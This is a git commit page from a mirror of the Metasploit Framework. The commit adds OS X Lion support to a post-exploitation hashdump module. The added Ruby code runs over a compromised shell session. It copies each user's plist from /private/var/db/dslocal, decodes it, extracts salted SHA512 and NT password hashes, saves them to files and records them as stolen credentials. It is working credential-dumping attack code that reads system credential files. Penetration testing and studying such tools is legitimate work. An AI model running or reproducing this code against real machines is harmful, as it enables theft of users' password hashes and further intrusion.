infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Support for dumping OSX Lion SHA512 Salted hashes, thanks to hammackj for helping in figuring out how to parse the new format 

git-svn-id: file:///home/svn/framework3/trunk@13111 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Carlos Perez 2011-07-07 03:46:33 +00:00
parent 78f2525fdc
commit b8a232eaf5
1 changed files with 49 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

50
modules/post/osx/gather/hashdump.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post
This module dumps SHA1, LM and NT Hashes of Mac OS X Tiger, Leopard and Snow Leopard Systems. This module dumps SHA1, LM and NT Hashes of Mac OS X Tiger, Leopard and Snow Leopard Systems.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'], 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>','hammackj <jacob.hammack[at]hammackj.com>'],
'Version' => '$Revision$', 'Version' => '$Revision$',
'Platform' => [ 'osx' ], 'Platform' => [ 'osx' ],
'SessionTypes' => [ "shell" ] 'SessionTypes' => [ "shell" ]
@ -151,6 +151,54 @@ class Metasploit3 < Msf::Post
when /shell/ when /shell/
guid = session.shell_command_token("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp guid = session.shell_command_token("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp
end end
elsif ver_num =~ /10\.(7)/
require 'rexml/document'
hash_decoded = ""
profiles = cmd_exec("ls /private/var/db/dslocal/nodes/Default/users").split("\n")
if profiles
profiles.each do |p|
next if p =~ /^_/
next if p =~ /^daemon|root|nobody/
cmd_exec("cp /private/var/db/dslocal/nodes/Default/users/#{p.chomp} /tmp/")
cmd_exec("plutil -convert xml1 /tmp/#{p.chomp}")
file = cmd_exec("cat /tmp/#{p.chomp}")
doc = REXML::Document.new(file)
hash_text = doc.elements.to_a("///array")[2].elements["data"].text.gsub("\n\t\t","")
hash_text.unpack('m')[0].each_byte do |b|
hash_decoded << sprintf("%02X", b)
end
user = p.scan(/(\S*)\.plist/)
sha512 = hash_decoded.slice(104..213)
nt_hash = hash_decoded.slice(214..249)
print_status("SHA512:#{user}:#{sha512}")
file_local_write(sha1_file,"#{user}:#{sha512}")
report_auth_info(
:host => host,
:port => 0,
:sname => 'sha512',
:user => user,
:pass => sha512,
:active => false
)
if nt_hash !~ /000000000000000/
print_status("NT:#{user}:#{nt_hash}")
file_local_write(nt_file,"#{user}:#{nt_hash}")
report_auth_info(
:host => host,
:port => 445,
:sname => 'smb',
:user => user,
:pass => nt_hash,
:active => true
)
end
end
end
return
end end
# Extract the hashes # Extract the hashes